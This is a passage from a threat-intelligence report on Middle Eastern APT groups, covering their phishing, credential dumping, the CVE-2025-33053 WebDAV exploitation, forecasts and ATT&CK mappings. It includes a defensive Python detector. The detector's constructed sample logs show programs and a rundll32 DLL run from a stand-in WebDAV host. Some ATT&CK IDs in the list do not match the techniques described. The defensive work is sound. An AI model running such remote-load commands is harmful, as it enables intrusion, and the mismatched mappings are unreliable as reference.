  - Organizations must prioritize patch management and deploy advanced monitoring for indicators such as unusual WebDAV traffic and living-off-the-land binaries (LOLBins) abuse. Delayed action could result in significant espionage and compromise of critical defense infrastructure.
  - Examples:
    - March 2025 campaign targeting Turkish defense entities using Horus Agent implants
    - 2021 Microsoft Exchange zero-day exploitation, which triggered global emergency patching
  - Actionable Recommendation: Immediately review and accelerate patch deployment for CVE-2025-33053 and enhance network monitoring for WebDAV and LOLBin activity.
  - Rationale for Ranking: Ranked highest due to the immediacy of the threat, patch availability, and the high-value nature of targeted sectors.
- Continued Refinement and Expansion of Sophisticated Spear-Phishing Campaigns by Regional APT Groups
  - Stealth Falcon, OilRig, Molerats, and Dark Caracal will intensify spear-phishing campaigns using novel delivery mechanisms such as archive attachments with deceptive .url and .lnk files, LinkedIn phishing, and geopolitical-themed lures. These tactics exploit user trust and social engineering, bypassing traditional defenses and enabling initial access.
  - Sector-specific lures tailored to government, defense, telecom, and finance sectors increase the likelihood of successful compromise.
  - Examples:
    - OilRig’s LinkedIn phishing campaigns
    - Molerats’ geopolitical-themed spear-phishing targeting Israeli and Palestinian sectors
  - Actionable Recommendation: Conduct targeted, quarterly spear-phishing simulation exercises and enhance user training focused on recognizing sophisticated social engineering tactics.
  - Rationale for Ranking: Spear-phishing remains the primary initial access vector and is difficult to fully mitigate.
- Intensification of Credential Dumping and Active Directory Targeting to Facilitate Lateral Movement
  - Stealth Falcon and OilRig will escalate credential dumping operations, including extraction from virtual disk copies and use of tools like Mimikatz and LaZagne, to escalate privileges and maintain persistence. This increases the risk of widespread network compromise and data theft if not detected early.
  - This report highlights Stealth Falcon’s custom credential dumper and OilRig’s long-term intrusions deploying credential stealers and PowerShell backdoors.
  - Examples:
    - Stealth Falcon’s credential dumping from Active Directory virtual disk copies
    - OilRig’s use of credential stealers during eight-month intrusions in 2023
  - Actionable Recommendation: Deploy continuous monitoring and alerting for credential dumping activities, especially within Active Directory environments, and implement strict credential hygiene policies.
  - Rationale for Ranking: Credential access is critical for adversaries to deepen network compromise.
- Accelerated Adoption of Advanced Endpoint Detection and Response (EDR) Solutions Targeting Evasion Techniques
  - Organizations will increase deployment of EDR tools capable of detecting advanced evasion techniques such as code virtualization, process injection, and fileless malware execution, which are heavily used by these APT groups to avoid detection.
  - Stealth Falcon’s Horus Loader and Dark Caracal’s fileless malware campaigns exemplify the sophistication of these evasion methods.
  - Examples:
    - Horus Loader’s anti-analysis and code virtualization features
    - Dark Caracal’s use of Poco RAT and fileless malware
  - Actionable Recommendation: Invest in EDR solutions with behavioral analytics and anomaly detection focused on living-off-the-land binaries and fileless techniques.
  - Rationale for Ranking: Essential for reducing dwell time and mitigating stealthy intrusions.
- Enhancement of Regional and International Cyber Threat Intelligence Sharing Focused on Middle Eastern APT Groups
  - Given overlapping targets and TTPs, regional governments and allied nations will strengthen intelligence sharing platforms to exchange indicators of compromise (IOCs), TTP updates, and coordinate incident response. This collective defense approach aims to reduce the operational effectiveness of espionage and destructive campaigns.
  - Examples:
    - Coordinated sharing of IOCs related to Stealth Falcon’s zero-day exploitation
    - Joint tracking of OilRig’s supply chain compromises
  - Actionable Recommendation: Establish or reinforce cyber threat intelligence sharing frameworks with real-time data exchange and joint response capabilities.
  - Rationale for Ranking: A strategic enabler with longer-term benefits but less immediate impact on active campaigns.
Long-Term Forecast (12-24 months)
- Proliferation and Evolution of Zero-Day Exploitation and Multi-Stage Loader Techniques Among Middle Eastern APT Groups
  - Building on Stealth Falcon’s recent success with CVE-2025-33053, other regional APT groups, including OilRig and Molerats, are expected to invest in developing or acquiring zero-day exploits and sophisticated multi-stage loaders with advanced evasion capabilities. This will increase the complexity and stealth of future campaigns, challenging traditional detection methods and requiring innovative defense strategies.
  - Examples:
    - OilRig’s historical exploitation of CVE-2017-11882 and CVE-2019-0604
    - Use of multi-stage loaders such as Horus Loader and LIONTAIL framework
  - Industry Trend: Increased investment in zero-day research and exploit development by state actors
  - Actionable Recommendation: Invest in proactive threat hunting and vulnerability management programs, including collaboration with vendors for early vulnerability disclosure and patching.
  - Rationale for Ranking: Zero-day exploits have outsized impact and are difficult to defend against, making this the most critical long-term threat.
- Intensification of Supply Chain and Telecommunications Infrastructure Targeting by OilRig and Allied Groups
  - OilRig’s evolution toward supply chain compromise tactics will accelerate, focusing on telecommunications and critical infrastructure providers to maximize espionage reach and potential disruption. This includes targeting software providers and managed service providers in the Middle East and globally.
  - Examples:
    - OilRig’s documented supply chain attacks and use of DNS tunneling for stealthy exfiltration
    - Analogous campaigns by Iranian-aligned groups such as APT33 and FOX Kitten
  - Industry Trend: Supply chain attacks have become a favored vector for state-sponsored groups due to their broad impact
  - Actionable Recommendation: Critical infrastructure operators should implement rigorous supply chain risk management, including vendor security assessments and continuous monitoring.
  - Rationale for Ranking: Supply chain attacks can cause widespread disruption and espionage.
- Shifts in Targeting and Operational Tempo Driven by Geopolitical Realignments in the Middle East
  - As normalization agreements and shifting alliances reshape regional dynamics, groups like Stealth Falcon and OilRig will adjust targeting priorities and operational tempo. Stealth Falcon may intensify campaigns against newly perceived adversaries, while OilRig may recalibrate efforts in response to diplomatic pressures or conflicts.
  - Examples:
    - Historical shifts in Iranian cyber operations following diplomatic developments
    - Potential increased targeting of Gulf states by Iranian-aligned groups amid regional tensions
  - Actionable Recommendation: Integrate geopolitical analysis into threat modeling to anticipate changes in adversary behavior.
  - Rationale for Ranking: Geopolitical factors strongly influence threat actor motivations but are subject to unpredictability.
- Adoption of AI-Driven Behavioral Analytics and Automated Threat Hunting to Counter Advanced Evasion Techniques
  - Defensive technologies will increasingly incorporate AI and machine learning to detect subtle behavioral anomalies indicative of living-off-the-land tactics, fileless malware, and code virtualization evasion. This is critical to counter the sophisticated TTPs employed by these APT groups.
  - Industry Trend: Leading cybersecurity vendors are deploying AI-driven EDR and SOAR platforms, with early adoption reported in Middle Eastern critical sectors.
  - Actionable Recommendation: Evaluate and adopt AI-enhanced security solutions and develop skilled threat hunting teams to leverage these technologies effectively.
  - Rationale for Ranking: A key technological evolution in defense, essential for future resilience.
- Potential Emergence of Collaborative or Competitive Dynamics Among Regional APT Groups Leading to Shared Toolsets or Divergent Tactics
  - While direct links between Stealth Falcon, OilRig, Molerats, and Dark Caracal remain unconfirmed, this report documents overlaps in infrastructure and malware families, such as shared use of PowerShell backdoors and similar C2 frameworks. This suggests potential future collaboration or competition, which could result in shared toolsets or divergent tactics complicating attribution and defense.
  - Examples:
    - Molerats’ close affiliation with APT-C-23 (Arid Viper) sharing infrastructure and malware
    - Overlaps in TTPs and infrastructure reuse among Middle Eastern espionage groups
  - Actionable Recommendation: Enhance analytic capabilities to detect shared infrastructure and evolving TTPs, improving attribution accuracy and response coordination.
  - Rationale for Ranking: Understanding these dynamics is important for anticipating threat evolution and improving defense posture.
MITRE ATT&CK IDs
T1566.001, T1566.002, T1204, T1203, T1059.001, T1003, T1055, T1041, T1027, T1053.005, T1195, T1048, T1036, T1021.001, T1074
Appendix
References
- (2025-06-10) – Stealth Falcon's Exploit of Microsoft Zero Day Vulnerability – Check Point Research
- (2025-01-29) – Inside APT34 (OilRig): Tools, Techniques, and Global Cyber Threats – Trustwave Blog
- (2025-05-15) – Molerats – Threat Actor Profile – FortiGuard Labs
- (2025-03-07) – Dark Caracal Threat Advisory Featuring Poco RAT – HivePro
- (2016-05-29) – Keep Calm and (Don't) Enable Macros: A New Threat Actor Targets UAE Dissidents – Citizen Lab (Archived)
- (2024-12-01) – MITRE ATT&CK Updates and Analysis on Middle Eastern APT Groups – MITRE Corporation
- (2025-06-09) – OilRig Threat Actor Profile – Cyble
- (2025-06-11) – Molerats – FortiGuard Labs
- (2023-10-26) – AridViper, an intrusion set allegedly associated with Hamas – SEKOIA.IO
- (2024-09-18) – Dark Caracal – MISP Galaxy
- (2025-06-11) – Stealth Falcon – InsightIDR Documentation
AlphaHunt
(c) 2025 CSIRT Gadgets, LLC
MITRE ATT&CK
Techniques
- T1566.001 (Spearphishing Attachment): Primary initial infection vector for Stealth Falcon, OilRig, Molerats, and Dark Caracal. Used to deliver malware via archive attachments, .url, or .lnk files. Recent Stealth Falcon campaigns used spear-phishing emails with archive attachments containing .url files that triggered malware hosted on WebDAV servers.
- T1566.002 (Spearphishing Link): Used by Stealth Falcon and OilRig to lure targets into clicking malicious links, including LinkedIn phishing campaigns. This social engineering tactic is effective against government and defense sectors.
- T1204 (User Execution): Critical for execution of malicious payloads delivered via spear-phishing. All groups rely on user interaction to trigger malware execution, making user awareness a key defense point.
- T1210 (Exploitation of Remote Services): Central to Stealth Falcon’s recent high-profile espionage campaigns exploiting CVE-2025-33053, a zero-day vulnerability in Microsoft Windows WebDAV. This allowed remote code execution without user interaction, increasing attack stealth and impact.
- T1059.001 (Command and Scripting Interpreter: PowerShell): Widely used by Stealth Falcon, OilRig, Molerats, and Dark Caracal for post-exploitation, persistence, and lateral movement. PowerShell scripts enable flexible and stealthy execution of commands.
- T1003 (Credential Dumping): Employed by Stealth Falcon and OilRig to extract credentials from Active Directory and virtual disk copies. This facilitates lateral movement and privilege escalation within targeted networks.
- T1055 (Process Injection): Used by Stealth Falcon to execute code stealthily within legitimate processes, evading detection and maintaining persistence.
- T1041 (Exfiltration Over C2 Channel): All groups exfiltrate data via their command and control channels, essential for espionage objectives.
- T1027 (Obfuscated Files or Information): Stealth Falcon uses code virtualization and anti-analysis techniques in Horus Loader to evade detection by security tools.
- T1053.005 (Scheduled Task/Job): Used by Stealth Falcon and OilRig for persistence and execution of payloads, enabling long-term access.
- T1195 (Supply Chain Compromise): OilRig has evolved to conduct supply chain attacks, expanding their attack surface and stealth capabilities.
- T1048 (Exfiltration Over Alternative Protocol): OilRig uses DNS tunneling and HTTP for stealthy data exfiltration.
- T1036 (Masquerading): OilRig employs masquerading to disguise malware and tools, aiding in evasion.
- T1021.001 (Remote Services: Remote Desktop Protocol): OilRig uses RDP for lateral movement, facilitating access to remote systems.
- T1074 (Data Staged): Molerats stages data before exfiltration to optimize data theft operations.
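As an added defensive example (not code from this report or any cited vendor), the triage below scans constructed Sysmon-style process-creation records for the UNC path forms the Windows WebClient redirector uses for WebDAV (\\host@port\..., \\host@SSL@port\..., \\host\DavWWWRoot\...), the delivery path the T1566.001 and T1210 entries describe for the .url attachments. The record format, field names and the 198.51.100.7 address are constructed for the example.

```python
import re

# WebClient mini-redirector UNC forms: \\host@80\DavWWWRoot\x, \\host@SSL@443\x
# or \\host\DavWWWRoot\x. Plain \\host\share\x paths are deliberately not
# matched, so ordinary file-server access does not alert.
WEBDAV_UNC = re.compile(
    r"\\\\[\w.\-]+(?:@SSL)?@\d{1,5}\\\S*"
    r"|\\\\[\w.\-]+\\DavWWWRoot\\\S*",
    re.IGNORECASE,
)
KV = re.compile(r'(\w+)="([^"]*)"')  # constructed key="value" record format

def parse_event(line: str) -> dict:
    """Split one constructed process-creation record into a field dict."""
    return dict(KV.findall(line))

def find_webdav_launches(lines):
    """Return one finding per process-creation record (EventID 1) whose image
    path or command line references a WebDAV UNC path."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev.get("EventID") != "1":
            continue
        for field in ("Image", "CommandLine"):
            m = WEBDAV_UNC.search(ev.get(field, ""))
            if m:
                findings.append({"record": n, "image": ev.get("Image", ""),
                                 "parent": ev.get("ParentImage", ""), "webdav_ref": m.group(0)})
                break
    return findings

# Constructed sample records (not real telemetry); 198.51.100.7 is a documentation address.
SAMPLE_LOG = [
    'EventID="1" Image="C:\\Windows\\explorer.exe" ParentImage="C:\\Windows\\System32\\userinit.exe" CommandLine="C:\\Windows\\Explorer.EXE"',
    'EventID="1" Image="\\\\198.51.100.7@80\\DavWWWRoot\\report.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="\\\\198.51.100.7@80\\DavWWWRoot\\report.exe"',
    'EventID="1" Image="C:\\Windows\\System32\\rundll32.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="rundll32.exe \\\\198.51.100.7@SSL@443\\stage.dll,Run"',
    'EventID="1" Image="C:\\Tools\\viewer.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="viewer.exe \\\\fileserver\\share\\doc.docx"',
    'EventID="3" Image="C:\\Windows\\System32\\svchost.exe" ParentImage="" CommandLine="\\\\198.51.100.7@80\\DavWWWRoot\\x"',
]

if __name__ == "__main__":
    for f in find_webdav_launches(SAMPLE_LOG):
        print(f"record {f['record']}: {f['image']} (parent {f['parent']}) -> {f['webdav_ref']}")
```

Records 2 and 3 are flagged; the plain file-server UNC in record 4 and the non-process event in record 5 are not.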
Tactics
- TA0001 (Initial Access): Spearphishing and exploitation of remote services are primary initial access methods for all groups.
- TA0005 (Defense Evasion): Techniques like obfuscation, process injection, and masquerading are used to evade detection, critical for stealthy operations.
- TA0007 (Discovery): File and directory discovery, process discovery, and network scanning enable targeted attacks and lateral movement.
Procedures
- G0038 (Stealth Falcon): Uses spear-phishing with archive attachments containing .url/.lnk files, exploits the CVE-2025-33053 zero-day, employs Horus Loader and Horus Agent implants, and uses credential dumping from virtual disk copies. The exploitation of CVE-2025-33053 allowed remote code execution via a WebDAV server, significantly increasing stealth and impact in recent campaigns.
- G0049 (OilRig): Conducts spear-phishing with tailored lures, exploits known vulnerabilities (CVE-2017-11882, CVE-2019-0604), uses PowerShell backdoors, and deploys destructive ransomware and wiper malware. OilRig’s supply chain compromise tactics have evolved to target software providers, increasing their reach and persistence.
- G0021 (Molerats): Uses spear-phishing with geopolitical lures, deploys various RATs (BlackShades, DarkComet), and stages data before exfiltration. Focused on espionage in Israeli and Palestinian sectors.
- G0070 (Dark Caracal): Employs phishing with malicious PDFs, fileless malware, and social engineering aligned with Lebanese intelligence objectives. Uses Poco RAT and fileless techniques for stealth.
Software
- S0609 (Horus Agent): Custom implant used by Stealth Falcon, built on the Mythic C2 framework and designed for stealth and selective payload deployment.
- S0608 (Horus Loader): Multi-stage loader with code virtualization and anti-analysis features used by Stealth Falcon, enabling stealthy payload delivery.
- S0343 (BONDUPDATER): Malware used by OilRig for backdoor access.
- S0344 (Helminth): OilRig backdoor malware for persistence.
- S0345 (ISMAgent): OilRig malware supporting stealthy command and control.
- S0346 (LIONTAIL): Custom loader and memory-resident shellcode framework used by OilRig for advanced evasion.
- S0607 (Poco RAT): Malware used by Dark Caracal for espionage.
- Various RATs (BlackShades, DarkComet, SPARK RAT, Quasar RAT): Used by Molerats for remote access and surveillance.
Mitigations
- M1037 (User Training): Training users to recognize spear-phishing and social engineering attacks is critical given the widespread use of these techniques.
- M1050 (Patch Management): Timely application of patches, especially for zero-day vulnerabilities like CVE-2025-33053, is essential to prevent exploitation.
- M1027 (Credential Access Protection): Monitoring and restricting credential dumping activities helps defend against lateral movement and privilege escalation.
Groups
- G0038 Stealth Falcon: UAE-linked APT group active since 2012, known for zero-day exploits, spear-phishing, and custom malware like Horus Agent. Recently exploited CVE-2025-33053 to target Middle Eastern defense sectors.
  - Stealth Falcon's Exploit of Microsoft Zero Day Vulnerability
- G0049 OilRig (APT34): Iranian state-sponsored group active since 2014, targeting government, energy, and critical infrastructure. Known for spear-phishing, supply chain attacks, and destructive malware.
  - Inside APT34 (OilRig): Tools, Techniques, and Global Cyber Threats
- G0021 Molerats (APT-C-23 / Arid Viper): Arabic-speaking, politically motivated group linked to Hamas, active since 2012. Uses spear-phishing and various RATs targeting Israeli and Palestinian sectors.
  - Molerats – Threat Actor Profile – FortiGuard Labs
- G0070 Dark Caracal: Lebanese intelligence-linked group active since 2012. Employs phishing, fileless malware, and social engineering. Uses Poco RAT for espionage.
  - Dark Caracal Threat Advisory Featuring Poco RAT – HivePro